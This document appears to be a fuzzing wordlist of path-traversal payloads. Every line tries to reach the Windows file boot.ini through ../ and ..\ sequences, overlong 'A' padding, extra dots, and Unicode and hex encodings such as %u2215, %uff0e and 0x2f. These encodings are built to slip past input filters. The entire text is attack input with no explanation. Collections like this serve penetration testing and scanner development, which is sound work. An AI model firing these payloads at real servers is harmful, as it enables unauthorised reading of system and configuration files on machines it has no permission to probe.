-AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\..\boot.ini -.../boot.ini -.../.../boot.ini -.../.../.../boot.ini -.../.../.../.../boot.ini -.../.../.../.../.../boot.ini -.../.../.../.../.../.../boot.ini -.../.../.../.../.../.../.../boot.ini -.../.../.../.../.../.../.../.../boot.ini -...\boot.ini -...\...\boot.ini -...\...\...\boot.ini -...\...\...\...\boot.ini -...\...\...\...\...\boot.ini -...\...\...\...\...\...\boot.ini -...\...\...\...\...\...\...\boot.ini -...\...\...\...\...\...\...\...\boot.ini -..../boot.ini -..../..../boot.ini -..../..../..../boot.ini -..../..../..../..../boot.ini -..../..../..../..../..../boot.ini -..../..../..../..../..../..../boot.ini -..../..../..../..../..../..../..../boot.ini -..../..../..../..../..../..../..../..../boot.ini -....\boot.ini -....\....\boot.ini -....\....\....\boot.ini -....\....\....\....\boot.ini -....\....\....\....\....\boot.ini -....\....\....\....\....\....\boot.ini -....\....\....\....\....\....\....\boot.ini -....\....\....\....\....\....\....\....\boot.ini -........................................................................../boot.ini -........................................................................../../boot.ini -........................................................................../../../boot.ini -........................................................................../../../../boot.ini -........................................................................../../../../../boot.ini -........................................................................../../../../../../boot.ini -........................................................................../../../../../../../boot.ini -........................................................................../../../../../../../../boot.ini -..........................................................................\boot.ini -..........................................................................\..\boot.ini -..........................................................................\..\..\boot.ini -..........................................................................\..\..\..\boot.ini -..........................................................................\..\..\..\..\boot.ini -..........................................................................\..\..\..\..\..\boot.ini -..........................................................................\..\..\..\..\..\..\boot.ini -..........................................................................\..\..\..\..\..\..\..\boot.ini -..%u2215boot.ini -..%u2215..%u2215boot.ini -..%u2215..%u2215..%u2215boot.ini -..%u2215..%u2215..%u2215..%u2215boot.ini -..%u2215..%u2215..%u2215..%u2215..%u2215boot.ini -..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215boot.ini -..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215boot.ini -..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215boot.ini -%uff0e%uff0e/boot.ini -%uff0e%uff0e/%uff0e%uff0e/boot.ini -%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/boot.ini -%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/boot.ini -%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/boot.ini -%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/boot.ini -%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/boot.ini -%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/boot.ini -%uff0e%uff0e%u2215boot.ini -%uff0e%uff0e%u2215%uff0e%uff0e%u2215boot.ini -%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215boot.ini -%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215boot.ini -%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215boot.ini -%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215boot.ini -%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215boot.ini -%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215boot.ini -..%u2216boot.ini -..%u2216..%u2216boot.ini -..%u2216..%u2216..%u2216boot.ini -..%u2216..%u2216..%u2216..%u2216boot.ini -..%u2216..%u2216..%u2216..%u2216..%u2216boot.ini -..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216boot.ini -..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216boot.ini -..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216boot.ini -..%uEFC8boot.ini -..%uEFC8..%uEFC8boot.ini -..%uEFC8..%uEFC8..%uEFC8boot.ini -..%uEFC8..%uEFC8..%uEFC8..%uEFC8boot.ini -..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8boot.ini -..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8boot.ini -..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8boot.ini -..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8boot.ini -..%uF025boot.ini -..%uF025..%uF025boot.ini -..%uF025..%uF025..%uF025boot.ini -..%uF025..%uF025..%uF025..%uF025boot.ini -..%uF025..%uF025..%uF025..%uF025..%uF025boot.ini -..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025boot.ini -..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025boot.ini -..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025boot.ini -%uff0e%uff0e\boot.ini -%uff0e%uff0e\%uff0e%uff0e\boot.ini -%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\boot.ini -%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\boot.ini -%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\boot.ini -%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\boot.ini -%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\boot.ini -%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\boot.ini -%uff0e%uff0e%u2216boot.ini -%uff0e%uff0e%u2216%uff0e%uff0e%u2216boot.ini -%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216boot.ini -%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216boot.ini -%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216boot.ini -%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216boot.ini -%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216boot.ini -%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216boot.ini -..0x2fboot.ini -..0x2f..0x2fboot.ini -..0x2f..0x2f..0x2fboot.ini -..0x2f..0x2f..0x2f..0x2fboot.ini -..0x2f..0x2f..0x2f..0x2f..0x2fboot.ini -..0x2f..0x2f..0x2f..0x2f..0x2f..0x2fboot.ini -..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2fboot.ini -..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2fboot.ini -0x2e0x2e/boot.ini -0x2e0x2e/0x2e0x2e/boot.ini -0x2e0x2e/0x2e0x2e/0x2e0x2e/boot.ini -0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/boot.ini -0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/boot.ini -0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/boot.ini -0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/boot.ini -0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/boot.ini -0x2e0x2e0x2fboot.ini -0x2e0x2e0x2f0x2e0x2e0x2fboot.ini -0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2fboot.ini -0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2fboot.ini -0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2fboot.ini -0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2fboot.ini -0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2fboot.ini -0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2fboot.ini -..0x5cboot.ini -..0x5c..0x5cboot.ini -..0x5c..0x5c..0x5cboot.ini -..0x5c..0x5c..0x5c..0x5cboot.ini -..0x5c..0x5c..0x5c..0x5c..0x5cboot.ini -..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cboot.ini -..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cboot.ini -..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cboot.ini -0x2e0x2e\boot.ini -0x2e0x2e\0x2e0x2e\boot.ini -0x2e0x2e\0x2e0x2e\0x2e0x2e\boot.ini -0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\boot.ini -0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\boot.ini -0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\boot.ini -0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\boot.ini 